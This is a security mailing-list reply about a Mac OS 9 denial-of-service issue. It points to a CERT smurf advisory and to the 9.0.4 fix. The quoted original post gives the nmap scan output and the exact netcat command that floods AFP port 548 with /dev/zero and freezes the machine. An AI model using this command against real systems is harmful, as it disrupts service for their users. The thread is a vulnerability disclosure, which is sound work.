Re: Apple Mac DoS

[Ian Stoba <ian () BABCOCKBROWN COM>]

Mac OS 9.0 is subject to smurf amplification. Here's a link to the CERT advisory:

http://www.cert.org/advisories/CA-98.01.smurf.html

This is fixed in Mac OS 9.0.4. The update is freely available from Apple:

http://asu.info.apple.com/swupdates.nsf/artnum/n11617

Also, I happened to buy a copy of Mac OS 9 off the shelf in a CompUSA store this week
and noticed that the version on the install CD was 9.0.4.

The Q wrote:

>   I have noticed some unusual behaviour with Mac OS 9
>   I am not a Mac user so I apologize if this is a known bug
>
>   I have checked the archives and generally on the Net and can find no
> mention of this effect
>
>   any way a bit of background...
>
>   I was nmaping a mac (running os 9) to see if I could diagnose why a smb
> connection couldn't be established. Not being familiar with mac os (at all)
> I telnetted to the open ports and didn't get a lot.
>
>   erm...
>
>   then decided to try a netcat to each port.... (don't ask why)
>
>   well to cut a long story short it causes a MASSIVE DoS on the mac if you
> net cat /dev/zero to port 548 tcp. The Machine needs a reset before it will
> respond. Surely this can't be right?
>
>   the details
>
>   - Ports open are
>
>   testhost@testhost ]$ nmap 192.168.1.96     ## IP of a mac boxen
>
>   Starting nmap V. 2.53 by fyodor () insecure org ( www.insecure.org/nmap/ )
>   Interesting ports on  (192.168.1.96):
>   (The 1521 ports scanned but not shown below are in state: closed)
>   Port       State       Service
>   427/tcp    open        svrloc
>   548/tcp    open        afpovertcp
>
>   Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
>
>   to cause the DoS
>
>   testhost@testhost ]$./nc -v 192.168.1.96 548 < /dev/zero
>
>   caused massive DoS - mouse nonfunctional (important on a mac :o)
>
> of course when you stop the netcat the mac returns to normal after 10-20
> secs
>
> _____________________________________________________________________________________
> Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com
----------------------------------------- (on tiburon)

This email message may contain information that is confidential and
proprietary to Babcock & Brown or a third party.  If you are not the
intended recipient, please contact the sender and destroy the original
and any copies of the original message.  Any review, retransmission,
dissemination or other use of, or taking any action in reliance upon,
the information contained in this message by persons other than the
intended recipient is prohibited.

While Babcock & Brown has taken reasonable steps to do so, it does not
represent, warrant and/or guarantee that the integrity of this
communication has been maintained nor that the message is free of
errors, viruses, interception or interference.

Additional Legal Notices can be found at
http://www.babcockbrown.com/email_disclaimer.html

---------------------------------------------------------